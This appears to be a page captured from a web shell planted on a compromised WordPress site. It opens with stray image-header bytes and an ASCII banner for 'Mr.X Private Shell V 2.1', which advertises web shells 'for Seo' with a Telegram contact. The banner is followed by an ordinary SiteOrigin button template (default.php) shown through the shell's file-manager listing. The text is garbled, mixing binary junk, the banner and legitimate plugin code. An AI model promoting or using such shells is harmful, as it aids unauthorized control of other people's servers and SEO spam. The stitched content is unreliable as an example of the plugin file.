����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @var array $button_attributes
* @var string $href
* @var string $onclick
* @var string $align
* @var string $icon_image_url
* @var string $icon
* @var string $icon_color
* @var string $text
*/
?>
<div class="ow-button-base ow-button-align-<?php echo esc_attr( $align ) ?>">
<a href="<?php echo sow_esc_url( do_shortcode( $href ) ) ?>" <?php foreach( $button_attributes as $name => $val ) echo $name . '="' . esc_attr( $val ) . '" ' ?>
<?php if ( ! empty( $on_click ) ) echo 'onclick="' . wp_unslash( esc_js( $on_click ) ) . '"'; ?>>
<span>
<?php
if( ! empty( $icon_image_url ) ) {
?><div class="sow-icon-image" style="<?php echo 'background-image: url(' . sow_esc_url( $icon_image_url ) . ')' ?>"></div><?php
}
else {
$icon_styles = array();
if ( ! empty( $icon_color ) ) $icon_styles[] = 'color: ' . $icon_color;
echo siteorigin_widget_get_icon( $icon, $icon_styles );
}
?>
<?php echo wp_kses_post( $text ) ?>
</span>
</a>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 1022 B | 0644 |
|